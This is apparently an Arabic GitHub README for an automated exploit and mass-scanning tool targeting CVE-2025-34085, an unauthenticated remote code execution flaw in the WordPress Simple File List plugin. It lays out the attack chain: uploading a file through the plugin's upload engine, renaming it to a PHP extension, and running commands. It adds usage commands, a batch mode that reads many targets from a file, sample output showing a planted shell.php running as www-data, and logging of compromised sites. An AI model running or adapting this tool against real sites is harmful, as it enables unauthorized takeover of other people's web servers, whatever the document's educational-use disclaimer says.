
استغلال ثغرة RCE بدون مصادقة في إضافة WordPress Simple File List
أداة استغلال وفحص آلية لثغرة CVE-2025-34085، وهي ثغرة حرجة في إضافة WordPress Simple File List، تتيح تنفيذ أوامر عن بُعد دون مصادقة عبر رفع وإعادة تسمية الملفات بطريقة تعسفية.
رفع الملف دون مصادقة
/wp-content/plugins/simple-file-list/ee-upload-engine.phpإعادة التسمية إلى امتداد PHP
.php أو امتداد مماثل عبر:/wp-content/plugins/simple-file-list/ee-file-engine.phpتنفيذ الحمولة
python3 CVE-2025-34085.py -u http://target.com --cmd "id"
ضع عناوين URL للأهداف في ملف targets.txt (سطر واحد لكل هدف)، ثم شغّل:
python3 CVE-2025-34085.py --cmd "whoami"
| الوسيط | الوصف |
|---|---|
-u | عنوان الهدف (مثل http://example.com) |
--cmd | الأمر المطلوب تنفيذه على الصدفة البعيدة (الافتراضي: id) |
--inline | استخدام حمولة مضمنة (بدون وسيط ?cmd=) |
[+] http://target.com | http://target.com/wp-content/uploads/simple-file-list/shell.php
uid=33(www-data) gid=33(www-data) groups=33(www-data)
يتم حفظ الأهداف الناجحة في ملف vuln.txt.
CVE-2025-34085.py — السكربت الرئيسي للاستغلالtargets.txt — (اختياري) قائمة نطاقات الأهدافvuln.txt — سجل الاستغلالات الناجحةينبغي على المسؤولين:
هذا المشروع مخصص لأغراض تعليمية واختبارات مصرح بها فقط. المؤلف لا يتحمل أي مسؤولية عن سوء الاستخدام أو الأضرار الناجمة عن هذه الأداة.
هذا المشروع مرخص بموجب رخصة MIT. 📄 عرض نص الترخيص الكامل
0xgh057r3c0n 🔗 GitHub: github.com/0xgh057r3c0n